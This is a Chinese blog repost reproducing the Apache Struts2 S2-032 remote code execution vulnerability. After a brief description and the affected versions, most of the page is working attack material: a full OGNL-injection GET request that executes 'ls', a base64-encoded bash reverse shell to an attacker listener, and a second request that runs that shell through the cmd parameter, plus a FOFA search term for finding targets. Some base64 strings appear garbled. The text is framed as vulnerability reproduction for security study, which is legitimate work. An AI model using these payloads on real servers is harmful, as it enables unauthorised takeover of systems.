本文转载于公众号:融云攻防实验室,原文地址:
漏洞复现-Struts2-032 远程命令执行漏洞
0x01 阅读须知
资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明
0x02 漏洞描述
Struts是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用JavaServlet/JSP技术,实现了基于JavaEEWeb应用的Model-View-Controller(MVC)设计模式的应用框架,是MVC经典设计模式中的一个经典产品。在Struts2-032中,远程攻击者利用漏洞可在开启动态方法调用功能的ApacheStruts2服务器上执行任意代码,取得网站服务器控制权。
![图片[1]--Struts2-032 远程命令执行漏洞-安全小天地](d2b5ca33bd192635.png)
0x03 漏洞复现
漏洞影响:Struts 2.3.20 – Struts Struts 2.3.28 (except 2.3.20.3 and 2.3.24.3)
FOFA:Struts2
1.构造poc查看文件ls
GET /?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=ls HTTP/1.1
Host: x.x.x.x:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: JSESSIONID=553c8t95665b1ewchrgqxyvxp
Upgrade-Insecure-Requests: 1![图片[2]--Struts2-032 远程命令执行漏洞-安全小天地](https://img.godyu.com/2023/12/20231226125114311.png?imageView2/0/format/webp/q/75)
2.设置base64反弹shell脚本,网址:https://ir0ny.top/pentest/reverse-encoder-shell.html
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3scsddxOTIuwwxxxLjMxLjdsaLzc3NzcgMD4mMQ==}|{base64,-d}|{bash,-i}![图片[3]--Struts2-032 远程命令执行漏洞-安全小天地](https://img.godyu.com/2023/12/20231226205116834.png?imageView2/0/format/webp/q/75)
3.nc监听,并执行反弹shell命令,得到一个shell(bash命令需要url编码)
GET /?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=bash%20-c%20%7Becho%2CYmzaCAxaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjEuMTQvNzc3NyAwPiYx%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D HTTP/1.1
Host: x.x.x.x:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: JSESSIONID=553c8t95665b1ewchrgqxyvxp
Upgrade-Insecure-Requests: 1![图片[4]--Struts2-032 远程命令执行漏洞-安全小天地](https://img.godyu.com/2023/12/20231226205117964.png?imageView2/0/format/webp/q/75)
THE END
暂无评论内容